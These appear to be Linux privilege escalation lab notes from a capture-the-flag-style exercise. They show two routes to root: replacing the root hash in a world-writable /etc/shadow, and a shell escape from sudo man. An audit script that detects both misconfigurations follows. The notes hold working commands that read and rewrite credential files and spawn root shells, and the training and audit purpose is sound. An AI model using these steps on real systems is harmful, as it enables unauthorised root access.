- Direct access to the target machine via `student` unprivileged user
- Find specific Linux privilege escalation vulnerabilities manually
- Some file permissions are not set properly; use them to elevate privileges.
- Look for world-writable files
- Find a file that could help to elevate privileges

```bash
find / -not -type l -perm -o+w
```

❗ `/etc/shadow` is writable by everyone!

```bash
ls -l /etc/shadow
cat /etc/shadow
# "root" user doesn't have a password specified
```

`/etc/shadow` stores passwords as hashes rather than plaintext, so the `root` password entry needs to be replaced with a hashed password

```bash
# Generate a password entry
openssl passwd -1 -salt abc password123
$1$abc$UWUoROXzUCsLsVzI0R2et.
# Edit and paste the hashed password into the /etc/shadow file
vim /etc/shadow
```

- Switch to the `root` user

```bash
su
# type "password123" password for "root" user
cd
ls
cat flag
```

- Direct access to the target machine via `student` unprivileged user
- Find misconfigured `sudo` privileges
- Find `setuid` programs

```bash
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null
```

📌 Useful tool - FallOfSudo

- Identify what commands the `student` user can run

```bash
sudo -l
```

❗ `/usr/bin/man` binary can be run with `SUDO` privileges, without providing a `root` user password

- This can happen on Linux systems for specific binaries that other users have to run with `SUDO` privileges. It looks harmless, but it can allow users to spawn privileged bash sessions, since the specific binary can be used to execute other commands. Those commands are executed with the binary's `root` privileges.

```bash
sudo man ls
```

- In the `man` scrolling page, a `bash` shell can be spawned using `!`

```bash
!/bin/bash
# a "root" bash session is received
```

- Retrieve the flag with the `root` user
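
Both misconfigurations in these notes (a world-writable `/etc/shadow` and a `NOPASSWD` sudo rule for `man`) can be caught by a read-only audit. The script below is an added example, not part of the original lab notes; the function names, the two lists, and the `labhost` sample output are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added audit example, not part of the original lab notes.

# Files that must never be writable by "other" (list is an assumption).
SENSITIVE_FILES="/etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/sudoers"
# Programs with an interactive "!" shell escape (assumed, non-exhaustive list).
SHELL_ESCAPE_BINS="man less more vi vim"

# Return 1 and print a finding if "other" can write to the path,
# 0 if it cannot, 2 if the path does not exist.
check_world_writable() {
    [ -e "$1" ] || return 2
    # Same predicate as the lab's find command, limited to one path.
    hit=$(find "$1" -prune ! -type l -perm -o+w -print 2>/dev/null)
    if [ -z "$hit" ]; then
        return 0
    fi
    echo "WORLD-WRITABLE $1"
    return 1
}

# Read `sudo -l` output on stdin and print every NOPASSWD command whose
# binary is in SHELL_ESCAPE_BINS.
flag_sudo_rules() {
    awk -v risky="$SHELL_ESCAPE_BINS" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
        /NOPASSWD:/ {
            sub(/^.*NOPASSWD:[ \t]*/, "")        # keep only the command list
            m = split($0, cmds, /,[ \t]*/)
            for (i = 1; i <= m; i++) {
                split(cmds[i], words, " ")        # first word is the binary path
                k = split(words[1], parts, "/")
                if (k > 0 && (parts[k] in bad)) print "RISKY-NOPASSWD " words[1]
            }
        }'
}

# File check against the real system (read-only).
for f in $SENSITIVE_FILES; do check_world_writable "$f" || true; done

# Sudo check on constructed sample output; on a host: sudo -n -l | flag_sudo_rules
flag_sudo_rules <<'EOF'
User student may run the following commands on labhost:
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/apt-get update, /usr/bin/less
EOF
```

A finding from the first check is fixed by restoring restrictive ownership and mode on the file; a finding from the second by removing the rule or requiring a password for it.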